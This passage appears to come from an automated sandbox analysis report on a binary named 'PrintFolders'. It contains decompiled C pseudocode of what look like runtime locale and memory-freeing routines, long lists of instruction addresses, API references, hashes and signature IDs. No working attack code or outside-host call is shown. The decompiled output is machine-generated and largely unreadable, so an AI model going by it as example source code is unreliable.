					_push( *0x4315ac);
					E0041B9AD(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x4315ac;
					while(1) {
						L2:
						_t254 = E0042509D(_t428, 0x351, 0x43166c);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x431670);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E0041B9AD(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x4315dc) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E0041E2B8(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E0041E2B8( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E0041E2B8( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E0041E2B8( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E0041E2B8( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t250 = _t363 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00413544();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0x43d054; // 0x7bd02ead
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E0041BA71(_t365, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E0041B5E7(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E004262BB(_t445, 0x431664);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0x4315ac;
													_v456 = 1;
													do {
														_t273 = E004162B4( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0x4315dc;
													} while (_t368 <= 0x4315dc);
													_t365 = _v468 + 2;
													_t274 = E00426262(_t382, _t365, 0x43166c);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E004251DD( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00413544();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0x43d054; // 0x7bd02ead
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E0041CB63(_t386, _t424) + 0x278;
																_t287 = E0041B5E7(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E0041ED2F(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E00421491(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E00413544();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E0041E821(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E0041B304(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E00421875(__eflags, _v712, 1, 0x431520, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E00410C5A( &_v536,  *0x43d1c4, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0x4315a8; // 0x40b230
																					 *0x42e234(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0x43d290;
																						if(_t402 == 0x43d290) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E0041E2B8( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E0041E2B8( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E0041E2B8( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E0041E2B8( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E0041E2B8(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E0040EBBF(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E0040ECF4();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E0040EBBF(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x0041ba71
0x0041ba79
0x0041ba7a
0x0041ba83
0x0041ba8b
0x0041ba8d
0x0041ba8f
0x0041ba92
0x0041bbaf
0x0041bbb2
0x0041ba98
0x0041ba98
0x0041ba99
0x0041ba9b
0x0041ba9e
0x0041baa1
0x0041baa4
0x0041baa7
0x0041baa9
0x0041baac
0x0041bab1
0x0041babf
0x0041bac9
0x0041bacc
0x0041bacf
0x0041bacf
0x0041bada
0x0041badf
0x0041bae4
0x00000000
0x0041baea
0x0041baed
0x0041baed
0x0041baf0
0x0041baf2
0x0041baf5
0x0041baf7
0x0041baf7
0x0041baf7
0x0041bafa
0x0041bafa
0x0041bafa
0x0041bb00
0x00000000
0x00000000
0x0041bb05
0x0041bb1c
0x0041bb1c
0x0041bb07
0x0041bb07
0x0041bb0f
0x00000000
0x0041bb11
0x0041bb11
0x0041bb14
0x0041bb1a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bb1a
0x0041bb0f
0x0041bb25
0x0041bb25
0x0041bb2a
0x0041bb2f
0x0041bb33
0x0041bb3f
0x0041bb42
0x0041bb45
0x0041bb4f
0x0041bb57
0x0041bb5f
0x00000000
0x0041bb65
0x0041bb69
0x0041bbb4
0x0041bbbd
0x0041bbc0
0x0041bbc2
0x0041bbc6
0x0041bbca
0x0041bbcf
0x0041bbd4
0x0041bbca
0x0041bbd8
0x0041bbda
0x0041bbdc
0x0041bbe0
0x0041bbe1
0x0041bbe6
0x0041bbeb
0x0041bbe1
0x0041bbee
0x0041bbf1
0x0041bbf4
0x0041bbf7
0x0041bbfa
0x0041bb6b
0x0041bb6e
0x0041bb71
0x0041bb73
0x0041bb77
0x0041bb7b
0x0041bb80
0x0041bb85
0x0041bb7b
0x0041bb8b
0x0041bb8d
0x0041bb92
0x0041bb97
0x0041bb9c
0x0041bb92
0x0041bb9d
0x0041bba1
0x0041bba4
0x0041bba8
0x0041bbab
0x0041bbab
0x00000000
0x0041bbae
0x00000000
0x0041bb5f
0x0041bb20
0x0041bb22
0x0041bb22
0x00000000
0x0041bb22
0x0041bc01
0x0041bc02
0x0041bc03
0x0041bc04
0x0041bc05
0x0041bc06
0x0041bc0b
0x0041bc0f
0x0041bc11
0x0041bc17
0x0041bc1e
0x0041bc21
0x0041bc24
0x0041bc25
0x0041bc26
0x0041bc29
0x0041bc2a
0x0041bc2d
0x0041bc33
0x0041bc35
0x0041bc5a
0x0041bc64
0x0041bc6a
0x0041bc6c
0x0041bc72
0x0041bc74
0x0041bed4
0x0041bed5
0x00000000
0x0041bc7a
0x0041bc7a
0x0041bc7e
0x0041bdec
0x0041be09
0x0041be0e
0x0041be11
0x0041be13
0x0041be19
0x0041be19
0x0041be1b
0x0041be1e
0x0041be20
0x0041be26
0x0041be26
0x0041be28
0x0041beaf
0x0041beaf
0x0041be2e
0x0041be2e
0x0041be30
0x0041be36
0x0041be39
0x0041be3c
0x0041be42
0x00000000
0x00000000
0x0041be44
0x0041be48
0x0041be71
0x0041be71
0x0041be73
0x0041be4a
0x0041be4a
0x0041be4e
0x0041be52
0x0041be59
0x0041be5f
0x00000000
0x0041be61
0x0041be61
0x0041be64
0x0041be67
0x0041be6f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041be6f
0x0041be5f
0x0041be7e
0x0041be7e
0x0041be80
0x0041beae
0x0041beae
0x00000000
0x0041be82
0x0041be82
0x0041be88
0x0041be89
0x0041be8a
0x0041be8b
0x0041be90
0x0041be96
0x0041be99
0x0041be9b
0x0041bea2
0x0041bea4
0x0041bea6
0x0041be9d
0x0041be9d
0x0041be9e
0x00000000
0x0041be9e
0x0041be9b
0x00000000
0x0041be80
0x0041be77
0x0041be79
0x0041be7c
0x0041be7c
0x00000000
0x0041be7c
0x0041beb5
0x0041beb5
0x0041beb6
0x0041beb9
0x0041bebf
0x0041bebf
0x0041bec8
0x0041beca
0x00000000
0x0041becc
0x0041becc
0x0041bece
0x00000000
0x0041bed0
0x0041bed0
0x0041bed0
0x0041bece
0x0041beca
0x00000000
0x0041bc84
0x0041bc84
0x0041bc89
0x00000000
0x0041bc8f
0x0041bc8f
0x0041bc94
0x00000000
0x0041bc9a
0x0041bc9a
0x0041bca0
0x0041bca5
0x0041bca7
0x0041bcae
0x0041bcaf
0x0041bcb1
0x00000000
0x00000000
0x0041bcb7
0x0041bcb7
0x0041bcbb
0x0041bcc1
0x00000000
0x0041bcc7
0x0041bcc9
0x0041bcca
0x0041bccd
0x00000000
0x0041bcd3
0x0041bcd3
0x0041bcd9
0x0041bcde
0x0041bce8
0x0041bcec
0x0041bcf1
0x0041bcf4
0x0041bcf6
0x00000000
0x0041bcf8
0x0041bcf8
0x0041bcfa
0x0041bcfd
0x0041bcfd
0x0041bd00
0x0041bd03
0x0041bd03
0x0041bd0e
0x0041bd10
0x0041bd12
0x00000000
0x00000000
0x0041bd12
0x00000000
0x0041bd14
0x0041bd14
0x0041bd1a
0x0041bd1d
0x0041bd1d
0x0041bd2b
0x0041bd34
0x0041bd39
0x0041bd3f
0x0041bd42
0x0041bd43
0x0041bd45
0x0041bd53
0x0041bd53
0x0041bd5a
0x0041bdbb
0x00000000
0x0041bd5c
0x0041bd5c
0x0041bd6a
0x0041bd6f
0x0041bd72
0x0041bd74
0x0041beef
0x0041bef1
0x0041bef2
0x0041bef3
0x0041bef4
0x0041bef5
0x0041bef6
0x0041befb
0x0041befe
0x0041beff
0x0041bf07
0x0041bf0e
0x0041bf11
0x0041bf12
0x0041bf15
0x0041bf19
0x0041bf1a
0x0041bf1d
0x0041bf2d
0x0041bf50
0x0041bf55
0x0041bf58
0x0041bf5a
0x0041c210
0x0041c210
0x0041c210
0x00000000
0x0041bf60
0x0041bf60
0x0041bf63
0x0041bf63
0x0041bf66
0x0041bf6c
0x0041bf72
0x0041bf75
0x0041bf77
0x0041bf7a
0x0041bf81
0x0041bf84
0x0041bf8a
0x00000000
0x00000000
0x0041bf8c
0x0041bf90
0x0041bfb9
0x0041bfb9
0x0041bf92
0x0041bf92
0x0041bf96
0x0041bf9a
0x0041bfa1
0x0041bfa7
0x00000000
0x0041bfa9
0x0041bfa9
0x0041bfac
0x0041bfaf
0x0041bfb7
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bfb7
0x0041bfa7
0x0041bfc6
0x0041bfc6
0x0041bfc8
0x0041bfd1
0x0041bfd7
0x0041bfda
0x0041bfda
0x0041bfdd
0x0041bfe0
0x0041bfe0
0x0041bff0
0x0041bffe
0x0041c003
0x0041c00a
0x0041c00c
0x00000000
0x0041c012
0x0041c018
0x0041c025
0x0041c02e
0x0041c034
0x0041c041
0x0041c048
0x0041c04d
0x0041c050
0x0041c052
0x0041c290
0x0041c296
0x0041c297
0x0041c298
0x0041c299
0x0041c29a
0x0041c29b
0x0041c2a0
0x0041c2a3
0x0041c2a6
0x0041c2a7
0x0041c2b9
0x0041c2be
0x0041c2c0
0x0041c2c9
0x00000000
0x0041c2c9
0x0041c2c2
0x0041c2c5
0x0041c2c7
0x00000000
0x00000000
0x0041c2cf
0x0041c058
0x0041c058
0x0041c066
0x0041c069
0x0041c07f
0x0041c086
0x0041c08b
0x0041c06b
0x0041c06b
0x0041c073
0x00000000
0x0041c075
0x0041c075
0x0041c07b
0x0041c07b
0x0041c073
0x0041c092
0x0041c099
0x0041c09c
0x0041c19a
0x0041c19d
0x0041c1aa
0x0041c1ad
0x0041c1b5
0x0041c1b5
0x0041c19f
0x0041c1a5
0x0041c1a5
0x0041c0a2
0x0041c0a2
0x0041c0ae
0x0041c0b4
0x0041c0ba
0x0041c0bd
0x0041c0c3
0x0041c0c6
0x0041c0c9
0x00000000
0x00000000
0x0041c0cb
0x0041c0d4
0x0041c0d8
0x0041c0e1
0x0041c0e5
0x0041c0e6
0x0041c0ec
0x0041c0f2
0x0041c0f8
0x0041c0fb
0x00000000
0x00000000
0x0041c0fd
0x0041c11c
0x0041c11c
0x0041c11f
0x0041c13c
0x0041c141
0x0041c144
0x0041c146
0x0041c184
0x0041c148
0x0041c148
0x0041c14e
0x0041c153
0x0041c15b
0x0041c15c
0x0041c15c
0x0041c173
0x0041c17a
0x0041c17d
0x0041c17f
0x0041c17f
0x0041c18a
0x0041c190
0x0041c190
0x0041c195
0x00000000
0x0041c195
0x0041c0ff
0x0041c101
0x0041c106
0x0041c10c
0x0041c115
0x0041c118
0x0041c118
0x00000000
0x0041c101
0x0041c1b8
0x0041c1b8
0x0041c1bc
0x0041c1c4
0x0041c1ca
0x0041c1cd
0x0041c1d3
0x0041c1d5
0x0041c221
0x0041c227
0x0041c273
0x0041c273
0x0041c229
0x0041c22e
0x0041c22e
0x0041c234
0x0041c238
0x00000000
0x0041c23a
0x0041c23e
0x0041c247
0x0041c253
0x0041c258
0x0041c261
0x0041c267
0x0041c26a
0x0041c26a
0x0041c238
0x0041c279
0x0041c281
0x0041c287
0x0041c28a
0x0041c1d7
0x0041c1dd
0x0041c1e7
0x0041c1f9
0x0041c200
0x0041c20d
0x00000000
0x0041c20d
0x00000000
0x0041c1d5
0x0041c052
0x0041bfca
0x0041bfca
0x0041c212
0x0041c215
0x0041c216
0x0041c217
0x0041c219
0x0041c220
0x0041c220
0x00000000
0x0041bfc8
0x0041bfc1
0x0041bfc3
0x0041bfc3
0x00000000
0x0041bfc3
0x0041bd7a
0x0041bd7a
0x0041bd7d
0x0041bd82
0x0041beea
0x00000000
0x0041bd88
0x0041bd8a
0x0041bd92
0x0041bd98
0x0041bd99
0x0041bd9f
0x0041bda0
0x0041bda5
0x0041bdab
0x0041bdae
0x0041bdb0
0x0041bdb2
0x0041bdb3
0x0041bdb3
0x0041bdc1
0x0041bdc1
0x0041bdc4
0x0041bdc7
0x0041bdc9
0x0041bdcc
0x0041bdce
0x0041bdce
0x0041bdd1
0x0041bdd1
0x0041bdd4
0x0041bdd7
0x00000000
0x0041bddd
0x0041bddd
0x0041bddf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bddf
0x0041bdd7
0x0041bd82
0x0041bd74
0x0041bd47
0x0041bd49
0x0041bd4a
0x0041bd4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bd4d
0x0041bd45
0x0041bccd
0x00000000
0x0041bcc1
0x0041bde5
0x00000000
0x0041bde5
0x0041bc94
0x0041bc89
0x0041bc7e
0x0041bc37
0x0041bc37
0x0041bc39
0x0041bc50
0x0041bc3b
0x0041bc3b
0x0041bc3c
0x0041bc3d
0x0041bc3e
0x0041bc43
0x0041bedb
0x0041bede
0x0041bedf
0x0041bee0
0x0041bee2
0x0041bee9
0x0041bee9
0x0041bc35
0x00000000

APIs

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

_free.LIBCMT ref: 0041BB80
_free.LIBCMT ref: 0041BB97
_free.LIBCMT ref: 0041BBB4
_free.LIBCMT ref: 0041BBCF
_free.LIBCMT ref: 0041BBE6

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
Instruction ID: dd5676bbc38bf4ddee88e11de66148e0d133859b732eb0a2b9d7e3b8ef29f219
Opcode Fuzzy Hash: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
Instruction Fuzzy Hash: 7051B571A00704AFDB119F2ACC41BAAB7F5EF48724F14056EE809D7794E739E981CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAF0 Relevance: 7.6, APIs: 5, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040CAF0(intOrPtr __edx, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				intOrPtr* _v28;
				char _v32;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				intOrPtr _t43;
				void* _t48;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				intOrPtr _t66;
				signed int _t74;
				void* _t75;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t79;
				signed int _t80;
				void* _t86;

				_t72 = __edx;
				_push(0xffffffff);
				_push(0x42cca4);
				_push( *[fs:0x0]);
				_t35 =  *0x43d054; // 0x7bd02ead
				_t36 = _t35 ^ _t80;
				_v20 = _t36;
				_push(_t36);
				 *[fs:0x0] =  &_v16;
				_t77 = _a4;
				_v28 = _t77;
				E0040E0A3( &_v32, 0);
				_v8 = 0;
				_t74 =  *0x450eb8; // 0x0
